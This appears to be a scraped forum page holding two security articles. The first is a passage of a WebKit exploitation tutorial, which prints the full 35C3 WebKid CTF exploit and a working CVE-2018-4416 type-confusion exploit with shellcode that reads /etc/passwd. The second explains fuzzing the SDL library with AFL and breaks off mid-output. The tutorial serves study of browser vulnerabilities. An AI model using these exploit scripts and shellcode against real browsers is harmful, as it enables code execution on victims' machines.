such, there // won't be runtime checks in the generated code. 
function helper() { return o[0]; } jitCompile(helper); // This will take the newly added fast-path, changing the structure // of |o| without the JIT code being deoptimized (because the structure // of |o| didn't transition, |o| went "back" to an existing structure). delete o.addrof_property; // Now we are free to modify the structure of |o| any way we like, // the JIT compiler won't notice (it's watching a now unrelated structure). o[0] = {}; return function(obj) { o[0] = obj; return Int64.fromDouble(helper()); }; } function setup_fakeobj() { var o = [1.1, 2.2, 3.3, 4.4]; o.fakeobj_property = 42; // Same as above, but write instead of reading from the array. function helper(addr) { o[0] = addr; } jitCompile(helper, 13.37); delete o.fakeobj_property; o[0] = {}; return function(addr) { helper(addr.asDouble()); return o[0]; }; } function pwn() { var addrof = setup_addrof(); var fakeobj = setup_fakeobj(); // verify basic exploit primitives work. var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); print('[+] exploit primitives working'); // from saelo: spray structures to be able to predict their IDs. // from Auxy: I am not sure about why spraying. i change the code to: // // var structs = [] // var i = 0; // var abc = [13.37]; // abc.pointer = 1234; // abc['prop' + i] = 13.37; // structs.push(abc); // var victim = structs[0]; // // and the payload still work stablely. It seems this action is redundant var structs = [] for (var i = 0; i < 0x1000; ++i) { var array = [13.37]; array.pointer = 1234; array['prop' + i] = 13.37; structs.push(array); } // take an array from somewhere in the middle so it is preceeded by non-null bytes which // will later be treated as the butterfly length. var victim = structs[0x800]; print(`[+] victim @ ${addrof(victim)}`); // craft a fake object to modify victim var flags_double_array = new Int64("0x0108200700001000").asJSValue(); var container = { header: flags_double_array, butterfly: victim }; // create object having |victim| as butterfly. var containerAddr = addrof(container); print(`[+] container @ ${containerAddr}`); // add the offset to let compiler recognize fake structure var hax = fakeobj(Add(containerAddr, 0x10)); // origButterfly is now based on the offset of **victim** // because it becomes the new butterfly pointer // and hax[1] === victim.pointer var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. 
test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; // Testing code, not related to exploit var plainObj = {}; var header = memory.read64(addrof(plainObj)); memory.writeInt64(memory.addrof(container), header); memory.test(); print("[+] limited memory read/write working"); // get targetd function var func = makeJITCompiledFunction(); var funcAddr = memory.addrof(func); // change the JIT code to shellcode // offset addjustment is a little bit complicated here :P print(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); print(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); print(`[+] JITCode instance @ ${jitCodeObjAddr}`); // var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); // offset for debug builds // final JIT Code address var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); print(`[+] JITCode @ ${jitCodeAddr}`); var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); shellcode.push(...strData.bytes()); // write shellcode memory.write(jitCodeAddr, shellcode); // trigger shellcode var res = func(); var flag = s.split('\n')[0]; if (typeof(alert) !== 'undefined') alert(flag); print(flag); } if (typeof(window) === 'undefined') pwn(); Conclusion on the Exploitation To conclude, the exploit uses two most important attack primitive - addrof and fakeobj - to leak and craft. A JITed function is leaked and overwritten with our shellcode array. Then we called the function to leak flag. Almost all the browser exploits follow this form. Thanks, 35C3 CTF organizers especially Saelo. It’s a great challenge to learn WebKit type confusion. Debugging WebKit Now, we have understood all the theories: architecture, object model, exploitation. Let’s start some real operations. To prepare, use compiled JSC from Setup part. Just use the latest version since we only discuss debugging here. I used to try to set breakpoints to find their addresses, but this is actually very stupid. JSC has many non-standard functions which can dump information for us (you cannot use most of them in Safari!): print() and debug(): Like console.log() in node.js, it will output information to our terminal. However, print in Safari will use a real-world printer to print documents. describe(): Describe one object. We can get the address, class member, and related information via the function. describeArrya(): Similar to describe(), but it focuses on array information of an object. readFile(): Open a file and get the content noDFG() and noFLT(): Disable some JIT compilers. Setting Breakpoints The easiest way to set breakpoints is breaking an unused function. Something like print or Array.prototype.slice([]);. Since we do not know if a function will affect one PoC most of the time, this method might bring some side effect. Setting vulnerable functions as our breakpoints also work. When you try to understand a vulnerability, breaking them will be extremely important. But their calling stacks may not be pleasant. We can also customize a debugging function (use int 3) in WebKit source code. 
Defining, implementing, and registering our function in /Source/JavaScriptCore/jsc.cpp. It helps us to hang WebKit in debuggers: static EncodedJSValue JSC_HOST_CALL functionDbg(ExecStage*); addFunction(vm, "dbg", functionDbg, 0); static EncodedJSValue JSC_HOST_CALL functionDbg(ExecStage* exec) { asm("int 3"); return JSValue::encode(jsUndefined()); } Since the third method requires us to modify the source code, I prefer the previous two personally. Inspecting JSC Objects Okay, we use this script: arr = [0, 1, 2, 3] debug(describe(arr)) print() Use our gdb with gef to debug; you may guess out we will break the print(): gdb jsc gef> b *printInternal gef> r --> Object: 0x7fffaf4b4350 with butterfly 0x7ff8000e0010 (Structure 0x7fffaf4f2b50:[Array, {}, CopyOnWriteArrayWithInt32, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 100 ... // Some backtrace The Object address and butterfly pointer might vary on your machine. If we edit the script, the address may also change. Please adjust them based on your output. We shall have a first glance on the object and its pointer: gef> x/2gx 0x7fffaf4b4350 0x7fffaf4b4350: 0x0108211500000064 0x00007ff8000e0010 gef> x/4gx 0x00007ff8000e0010 0x7ff8000e0010: 0xffff000000000000 0xffff000000000001 0x7ff8000e0020: 0xffff000000000002 0xffff000000000003 What if we change it to float? arr = [1.0, 1.0, 2261634.5098039214, 2261634.5098039214] debug(describe(arr)) print() We use a small trick here: 2261634.5098039214 represents as 0x4141414141414141 in memory. Finding value is more handy via the magical number (we use butterfly pointer directly here). In default, JSC will filled unused memory with 0x00000000badbeef0: gef> x/10gx 0x00007ff8000e0010 0x7ff8000e0010: 0x3ff0000000000000 0x3ff0000000000000 0x7ff8000e0020: 0x4141414141414141 0x4141414141414141 0x7ff8000e0030: 0x00000000badbeef0 0x00000000badbeef0 0x7ff8000e0040: 0x00000000badbeef0 0x00000000badbeef0 0x7ff8000e0050: 0x00000000badbeef0 0x00000000badbeef0 The memory layout is the same as the JSC Object Model part, so we won’t repeat here. Getting Native Code Now, it’s time to get compiled function. It plays an important role in understanding JSC compiler and exploiting: const ITERATIONS = 100000; function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); debug("jitCompile Ready") function makeJITCompiledFunction() { function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } func = makeJITCompiledFunction() debug(describe(func)) print() It’s not hard if you read previous section carefully. Now, we should get their native code in the debugger: --> Object: 0x7fffaf468120 with butterfly (nil) (Structure 0x7fffaf4f1b20:[Function, {}, NonArray, Proto:0x7fffaf4d0000, Leaf]), StructureID: 63 ... // Some backtrace ... gef> x/gx 0x7fffaf468120+24 0x7fffaf468138: 0x00007fffaf4fd080 gef> x/gx 0x00007fffaf4fd080+24 0x7fffaf4fd098: 0x00007fffefe46000 // In debug mode, it's okay to use 368 as offset // In release mode, however, it should be 352 gef> x/gx 0x00007fffefe46000+368 0x7fffefe46170: 0x00007fffafe02a00 gef> hexdump byte 0x00007fffafe02a00 0x00007fffafe02a00 55 48 89 e5 48 8d 65 d0 48 b8 60 0c 45 af ff 7f UH..H.e.H.`.E... 0x00007fffafe02a10 00 00 48 89 45 10 48 8d 45 b0 49 bb b8 2e c1 af ..H.E.H.E.I..... 
0x00007fffafe02a20 ff 7f 00 00 49 39 03 0f 87 9c 00 00 00 48 8b 4d ....I9.......H.M 0x00007fffafe02a30 30 48 b8 00 00 00 00 00 00 ff ff 48 39 c1 0f 82 0H.........H9... Put you dump byte to rasm2: rasm -d "you dump byte here" push ebp dec eax mov ebp, esp dec eax lea esp, [ebp - 0x30] dec eax mov eax, 0xaf450c60 invalid jg 0x11 add byte [eax - 0x77], cl inc ebp adc byte [eax - 0x73], cl inc ebp mov al, 0x49 mov ebx, 0xafc12eb8 invalid jg 0x23 add byte [ecx + 0x39], cl add ecx, dword [edi] xchg dword [eax + eax - 0x74b80000], ebx dec ebp xor byte [eax - 0x48], cl add byte [eax], al add byte [eax], al add byte [eax], al invalid dec dword [eax + 0x39] ror dword [edi], 0x82 Emmmm…the disassembly code is partially incorrect. At least we can see a draft now. 1 Day Exploitation Let’s use the bug in triggering bug section: CVE-2018-4416. It’s a type confusion. Since we already talked about WebKid, a similar CTF challenge which has type confusion bug, it won’t be difficult to understand this one. Switch to the vulnerable branch and start our journey. PoC is provided at the beginning of the article. Copy and paste the int64.js, shellcode.js, and utils.js from WebKid repo to your virtual machine. Root Cause Quotation from Lokihardt The following is description of CVE-2018-4416 from Lokihardt, with my partial highlight. When a for-in loop is executed, a JSPropertyNameEnumerator object is created at the beginning and used to store the information of the input object to the for-in loop. Inside the loop, the structure ID of the “this” object of every get_by_id expression taking the loop variable as the index is compared to the cached structure ID from the JSPropertyNameEnumerator object. If it’s the same, the “this” object of the get_by_id expression will be considered having the same structure as the input object to the for-in loop has. The problem is, it doesn’t have anything to prevent the structure from which the cached structure ID from being freed. As structure IDs can be reused after their owners get freed, this can lead to type confusion. Line by Line Explanation Comment in /* */ is my analysis, which might be inaccurate. Comment after // is by Lokihardt: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } /* Step 3 */ /* This is abother target */ /* We want to confuse it(tmp) with obj(fake_object_memory) */ let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. /* Step 4 */ /* Change the structure of tmp to {} */ tmp.__proto__ = {}; gc(); /* The structure of obj is also {} now */ obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. /* Step 5 */ /* Compiler believes obj and tmp share the same type now */ /* Thus, obj[k] will retrieve data from object with offset a */ /* In the patched version, it should be undefined */ return obj[k]; // Type confusion. } } /* Step 0 */ /* Prepare structure {} */ opt({}); /* Step 1 */ /* Target Array, 0x1234 is our fake address*/ let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; /* Step 2 */ /* Trigger type confusion*/ let fake_object = opt(fake_object_memory); /* JSC crashed */ print(fake_object); Debugging Let’s debug it to verify our thought. I modify the original PoC for easier debugging. 
But they are almost identical except additional print(): function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. debug("Confused Object: " + describe(obj)); return obj[k]; // Type confusion. } } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x41424344; let fake_object = opt(fake_object_memory); print() print(fake_object) Then gdb ./jsc, b *printInternal, and r poc.js. We can get: ... --> Confused Object: Object: 0x7fffaf6b0080 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Object, {}, NonArray, Proto:0x7fffaf6b3e80, Leaf]), StructureID: 142 --> Confused Object: Object: 0x7fffaf6cbe40 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Uint32Array, {}, NonArray, Proto:0x7fffaf6b3e00, Leaf]), StructureID: 142 ... Let’s take a glance at our fake address. JSC is too large to find your dream breakpoint. Let’s set a watchpoint to track its flow instead: gef> x/4gx 0x7fffaf6cbe40 0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000 0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064 gef> x/4gx 0x00007fe8014fc000 0x7fe8014fc000: 0x0000000041424344 0x0000000000000000 0x7fe8014fc010: 0x0000000000000000 0x0000000000000000 gef> rwatch *0x7fe8014fc000 Hardware read watchpoint 2: *0x7fe8014fc000 We get expected output later: Thread 1 "jsc" hit Hardware read watchpoint 2: *0x7fe8014fc000 Value = 0x41424344 0x00005555555bebd4 in JSC::JSCell::structureID (this=0x7fe8014fc000) at ../../Source/JavaScriptCore/runtime/JSCell.h:133 133 StructureID structureID() const { return m_structureID; } But why does it show at structure ID? We can get answer from their memory layout: obj (fake_object_memory): 0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000 0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064 tmp ({a: 1}): 0x7fffaf6cbdc0: 0x000016000000008b 0x0000000000000000 0x7fffaf6cbdd0: 0xffff000000000001 0x0000000000000000 So, the pointer of Uin32Array is returned as an object. And m_structureID is at the beginning of each JS Objects. Since 0x1234 is the first element of our array, it’s reasonable for structureID() to retrieve it. We can use data in Uint32Array to craft fake object now. Awesome! Constructing Attack Primitive addrof Now, we should craft a legal object. I choose {} (an empty object) as our target. How does an empty look like in memory(ignore scripting and debugging here): 0x7fe8014fc000: 0x010016000000008a 0x0000000000000000 Okay, it begins with 0x010016000000008a. We can simulate it in Uint32Array handy(remember to paste gc and opt to here): function gc() { ... // Same as above's } function opt(obj) { ... // Same as above;s } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); fake_object.a = {} print(fake_object_memory[4]) print(fake_object_memory[5]) Two mystery numbers are returned: 2591768192 # hex: 0x9a7b3e80 32731 # hex: 0x7fdb Obviously, it is in pointer format. We can leak arbitrary object now! fakeobj Getting a fakeob is almost identical to crafting addrof. 
The difference is that you need to fill an address to UInt32Array, then get the object via attribute a in fake_object Arbitrary R/W and Shellcode Execution It’s similar to the exploit script in WebKid challenge. The full script is too long to explain line by line. You can, however, find it here. You may need to try around 10 rounds to exploit successfully. It will read your /etc/passwd when succeed. Here is the core code: // get compiled function var func = makeJITCompiledFunction(); function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } // Typr confusion here function opt(obj) { for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // Compiler are misleaded that obj and tmp shared same type return obj[k]; } } opt({}); // Use Uint32Array to craft a controable memory // Craft a fake object header let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); debug(describe(fake_object)) // Use JIT to stablized our attribute // Attribute a will be used by addrof/fakeobj // Attrubute b will be used by arbitrary read/write for (i = 0; i < 0x1000; i ++) { fake_object.a = {test : 1}; fake_object.b = {test : 1}; } // get addrof // we pass a pbject to fake_object // since fake_object is inside fake_object_memory and represneted as integer // we can use fake_object_memory to retrieve the integer value function setup_addrof() { function p32(num) { value = num.toString(16) return "0".repeat(8 - value.length) + value } return function(obj) { fake_object.a = obj value = "" value = "0x" + p32(fake_object_memory[5]) + "" + p32(fake_object_memory[4]) return new Int64(value) } } // Same // But we pass integer value first. then retrieve object function setup_fakeobj() { return function(addr) { //fake_object_memory[4] = addr[0] //fake_object_memory[5] = addr[1] value = addr.toString().replace("0x", "") fake_object_memory[4] = parseInt(value.slice(8, 16), 16) fake_object_memory[5] = parseInt(value.slice(0, 8), 16) return fake_object.a } } addrof = setup_addrof() fakeobj = setup_fakeobj() debug("[+] set up addrof/fakeobj") var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); debug('[+] exploit primitives working'); // Use fake_object + 0x40 cradt another fake object for read/write var container_addr = Add(addrof(fake_object), 0x40) fake_object_memory[16] = 0x00001000; fake_object_memory[17] = 0x01082007; var structs = [] for (var i = 0; i < 0x1000; ++i) { var a = [13.37]; a.pointer = 1234; a['prop' + i] = 13.37; structs.push(a); } // We will use victim as the butterfly pointer of contianer object victim = structs[0x800] victim_addr = addrof(victim) victim_addr_hex = victim_addr.toString().replace("0x", "") fake_object_memory[19] = parseInt(victim_addr_hex.slice(0, 8), 16) fake_object_memory[18] = parseInt(victim_addr_hex.slice(8, 16), 16) // Overwrite container to fake_object.b container_addr_hex = container_addr.toString().replace("0x", "") fake_object_memory[7] = parseInt(container_addr_hex.slice(0, 8), 16) fake_object_memory[6] = parseInt(container_addr_hex.slice(8, 16), 16) var hax = fake_object.b var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. 
// we change the butterfly of victim to addr + 0x10 // when victim change the pointer attribute, it will read butterfly - 0x10 // which equal to addr + 0x10 - 0x10 = addr // read arbiutrary value is almost the same writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; memory.test(); debug("[+] limited memory read/write working"); // Get JIT code address debug(describe(func)) var funcAddr = memory.addrof(func); debug(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); debug(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); debug(`[+] JITCode instance @ ${jitCodeObjAddr}`); var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); //var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); debug(`[+] JITCode @ ${jitCodeAddr}`); // Our shellcode var shellcode = [0xeb, 0x3f, 0x5f, 0x80, 0x77, 0xb, 0x41, 0x48, 0x31, 0xc0, 0x4, 0x2, 0x48, 0x31, 0xf6, 0xf, 0x5, 0x66, 0x81, 0xec, 0xff, 0xf, 0x48, 0x8d, 0x34, 0x24, 0x48, 0x89, 0xc7, 0x48, 0x31, 0xd2, 0x66, 0xba, 0xff, 0xf, 0x48, 0x31, 0xc0, 0xf, 0x5, 0x48, 0x31, 0xff, 0x40, 0x80, 0xc7, 0x1, 0x48, 0x89, 0xc2, 0x48, 0x31, 0xc0, 0x4, 0x1, 0xf, 0x5, 0x48, 0x31, 0xc0, 0x4, 0x3c, 0xf, 0x5, 0xe8, 0xbc, 0xff, 0xff, 0xff, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x41] var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); // write shellcode shellcode.push(...strData.bytes()); memory.write(jitCodeAddr, shellcode); // trigger and get /etc/passwd func(); print() Acknowledgement Thanks to Sakura0 who guides me from the sketch. Otherwise, this post will come out much slower. I will also acknowledge all the authors in the reference list. Your share encourages the whole info-sec community! References Groß S, 2018, Black Hat USA, “Attacking Client-Side JIT Compilers” Han C, “js-vuln-db” Gianni A and Heel1an S, “Exploit WebKit Heap” Filip Pizlo, http://www.filpizlo.com, Thanks for many presentations! Groß S, 2018, 35C3 CTF WebKid Challenge dwfault, 2018, WebKit Debugging Skills Tags: WebKit Categories: Tutorial Updated: December 05, 2018 Sursa: https://www.auxy.xyz/tutorial/Webkit-Exp-Tutorial/#acknowledgement
    1 point
  15. How to Use Fuzzing in Security Research February 12, 2019 by Radu-Emanuel Chiscariu Introduction Fuzzing is one of the most widely used methods for automated software testing. Through fuzzing, one can generate a large number of possible inputs for an application, according to a set of rules, and inject them into a program to observe how the application behaves. In the security realm, fuzzing is regarded as an effective way to identify corner-case bugs and vulnerabilities. There is a plethora of fuzzing frameworks, both open-source and commercial. There are two major classes of fuzzing techniques: Evolutionary-based fuzzing: these fuzzers employ genetic algorithms to increase code coverage. They mutate the supplied test cases with the goal of reaching further into the analyzed application. Intuitively, this requires some form of code instrumentation to supply feedback to the mutation engine. Evolutionary-based fuzzers are, in general, oblivious to the required input format, sort of 'learning' it along the way. This technique is well supported and maintained in the open-source community. State-of-the-art tools include American Fuzzy Lop (AFL), libFuzzer, and honggfuzz. Generational-based fuzzing: as opposed to evolutionary-based fuzzers, these build inputs based on specifications and/or format definitions that provide context awareness. State-of-the-art commercial tools include Defensics and PeachFuzzer, and open-source tools include Peach, Spike, and Sulley. This classification is not mutually exclusive, but more of a general design distinction; there are tools that include both techniques, such as PeachFuzzer. Here at the Application and Threat Intelligence (ATI) Research Center, one of our objectives is to identify vulnerabilities in applications and help developers fix them before they are exploited. This is done by connecting different applications and libraries to our fuzzing framework. This article will show how we use fuzzing in our security research by highlighting some of our findings while investigating an open-source library. Fuzzing the SDL Library The Simple DirectMedia Layer (SDL) is a cross-platform library that provides an API for implementing multimedia software, such as games and emulators. Written in C, it is actively maintained and widely employed by the community. Choosing a Fuzzing Framework We are going to fuzz SDL using the well-known AFL. Written by lcamtuf, AFL uses runtime-guided techniques, compile-time instrumentation, and genetic algorithms to create mutated input for the tested application. It has an impressive trophy case of identified vulnerabilities, which is why it is considered one of the best fuzzing frameworks out there. Some researchers have studied AFL in detail and come up with extensions that modify the behavior of certain components, for example the mutation strategy or the importance attributed to different code branches. Such projects gave rise to FairFuzz, AFL-GO, afl-unicorn, AFLSmart, and python-AFL. We are going to use AFLFast, a project that implements fuzzing strategies targeting not only high-frequency code paths but also low-frequency paths, "to stress significantly more program behavior in the same amount of time." In short, during our research we observed that for certain fuzzing campaigns this optimization produces an approximately 2x speedup and better overall code coverage compared to vanilla AFL. Fuzzing Preparation To use AFL, you must compile the library's sources with AFL's compiler wrappers. 
$ ./configure CC=afl-clang-fast \ CFLAGS ="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" \ LDFLAGS="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" $ make; sudo make install As observed, we will use both the AFL instrumentation and the ASAN (Address Sanitizer) compiler tool, used to identify memory-related errors. As specified here, ASAN adds a 2x slowdown to execution speed to the instrumented program, but the gain is much higher, allowing us to possibly detect memory-related issues such as: Use-after-free (dangling pointer dereference) Heap buffer overflow Stack buffer overflow Global buffer overflow Use after return Use after scope Initialization order bugs Memory leaks Furthermore, to optimize the fuzzing process, we compile the sources with: -D_FORTIFY_SOURCE=0 (ASAN doesn't support source fortification, so disable it to avoid false warnings) -O2 (Turns on all optimization flags specified by -O ; for LLVM 3.6, -O1 is the default setting) Let’s check if the settings were applied successfully: $ checksec /usr/local/lib/libSDL-1.2.so.0 [*] '/usr/local/lib/libSDL-1.2.so.0' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ASAN: Enabled Checksec is a nice tool that allows users to inspect binaries for security options, such as whether the binary is built with a non-executable stack (NX), or with relocation table as read-only (RELRO). It also checks whether the binary is built with ASAN instrumentation, which is what we need. It is part of the pwntools Python package. As observed, the binaries were compiled with ASAN instrumentation enabled as we wanted. Now let’s proceed to fuzzing! Writing a Test Harness An AFL fuzzing operation consists of three primary steps: Fork a new process Feed it an input modified by the mutation engine Monitor the code coverage by keeping a track of which paths are reached using this input, informing you if any crashes or hangs occurred This is done automatically by AFL, which makes it ideal for fuzzing binaries that accept input as an argument, then parse it. But to fuzz the library, we must first make a test harness and compile it. In our case, a harness is simply a C program that makes use of certain methods from a library, allowing you to indirectly fuzz it. #include <stdlib.h> #include "SDL_config.h" #include "SDL.h" struct { SDL_AudioSpec spec; Uint8 *sound; /* Pointer to wave data */ Uint32 soundlen; /* Length of wave data */ int soundpos; /* Current play position */ } wave; /* Call this instead of exit(), to clean up SDL. */ static void quit(int rc){ SDL_Quit(); exit(rc); } int main(int argc, char *argv[]){ /* Load the SDL library */ if ( SDL_Init(SDL_INIT_AUDIO) < 0 ) { fprintf(stderr, "[-] Couldn't initialize SDL: %s\n",SDL_GetError()); return(1); } if ( argv[1] == NULL ) { fprintf(stderr, "[-] No input supplied.\n"); } /* Load the wave file */ if ( SDL_LoadWAV(argv[1], &wave.spec, &wave.sound, &wave.soundlen) == NULL ) { fprintf(stderr, "Couldn't load %s: %s\n", argv[1], SDL_GetError()); quit(1); } /* Free up the memory */ SDL_FreeWAV(wave.sound); SDL_Quit(); return(0); } Our intention here is to initialize the SDL environment, then fuzz the SDL_LoadWAV method pertaining to the SDL audio module. To do that, we will supply a sample WAV file, with which AFL will tamper using its mutation engine to go as far into the library code as possible. Introducing some new fuzzing terminology, this file represents our initial seed, which will be placed in the corpus_wave folder. 
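As an aside that anticipates the speed tweaks discussed in the next section: AFL's persistent mode can run many test cases inside a single process instead of forking for every input. Below is a hedged sketch of how the harness above could be adapted for it, assuming it is compiled with afl-clang-fast (which provides the __AFL_LOOP macro); the iteration count of 1000 is arbitrary:

#include <stdlib.h>
#include <stdio.h>
#include "SDL_config.h"
#include "SDL.h"

int main(int argc, char *argv[]) {
    SDL_AudioSpec spec;
    Uint8 *sound;      /* Pointer to wave data */
    Uint32 soundlen;   /* Length of wave data */

    if (argc < 2) {
        fprintf(stderr, "[-] No input supplied.\n");
        return 1;
    }
    if (SDL_Init(SDL_INIT_AUDIO) < 0) {
        fprintf(stderr, "[-] Couldn't initialize SDL: %s\n", SDL_GetError());
        return 1;
    }

    /* Each iteration parses one mutated file; after 1000 iterations AFL
     * restarts the process so that leaks do not accumulate forever. */
    while (__AFL_LOOP(1000)) {
        if (SDL_LoadWAV(argv[1], &spec, &sound, &soundlen) != NULL)
            SDL_FreeWAV(sound);
    }

    SDL_Quit();
    return 0;
}

For the rest of this walkthrough we stick with the simple fork-per-input harness shown above.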
Let’s compile it: $ afl-clang-fast -o harness_sdl harness_sdl.c -g -O2 \ -D_FORTIFY_SOURCE=0 -fsanitize=address \ -I/usr/local/include/SDL -D_GNU_SOURCE=1 -D_REENTRANT \ -L/usr/local/lib -Wl,-rpath,/usr/local/lib -lSDL -lX11 -lpthread And start the fuzzing process: $ afl-fuzz -i corpus_wave/ -o output_wave -m none -M fuzzer_1_SDL_sound \ -- /home/radu/apps/sdl_player_lib/harness_sdl @@ As you can see, starting a fuzzing job is easy, we just execute afl-fuzz with the following parameters: The initial corpus ( -i corpus_wave ) The output of the fuzzing attempt ( -o output_wave ) Path to the compiled harness Instruct AFL how to send the test sample to the fuzzed program ( @@ for providing it as an argument) Memory limit for the child process ( -m none since ASAN needs close to 20TB of memory on x86_64 architecture) There are other useful parameters that you can use, such as specifying a dictionary containing strings related to a certain file format, which would theoretically help the mutation engine reach certain paths quicker. But for now, let’s see how this goes. My display is ok, that is just a mountain in the back. We are conducting this investigation on a machine with 32GB of RAM, having 2 AMD Opteron 6328 CPUs, each with 4 cores per socket and 2 threads per core, giving us a total of 16 threads. As we can observe, we get 170 evaluated samples per second as the fuzzing speed. Can we do better than that? Optimizing for Better Fuzzing Speed Some of the things we can tweak are: By default, AFL forks a process every time it tests a different input. We can control AFL to run multiple fuzz cases in a single instance of the program, rather than reverting the program state back for every test sample. This will reduce the time spent in the kernel space and improve the fuzzing speed. This is called AFL_PERSISTENT mode. We can do that by including the __AFL_LOOP(1000) macro within our test harness. According to this, specifying the macro will force AFL to run 1000 times, with 1000 different inputs fed to the library. After that, the process is restarted by AFL. This ensures we regularly replace the process to avoid memory leaks. The test case specified as the initial corpus is 119KB, which is too much. Maybe we can find a significantly smaller test case? Or provide more test cases, to increase the initial code coverage? We are running the fuzzer from a hard disk. If we switch to a ramdisk, forcing the fuzzer to get its testcases directly from RAM, we might get a boost from this too. Last but not the least, we can run multiple instances in parallel, enforcing AFL to use 1 CPU for one fuzzing instance. Let’s see how our fuzzer performs with all these changes. Run, Fuzzer, run! For one instance, we get a 2.4x improvement speed and already a crash! Running one master instance and four more slave instances, we get the following stats: $ afl-whatsup -s output_wave/ status check tool for afl-fuzz by <lcamtuf@google.com> Summary stats ============= Fuzzers alive : 5 Total run time : 0 days, 0 hours Total execs : 0 million Cumulative speed : 1587 execs/sec Pending paths : 6 faves, 35 total Pending per 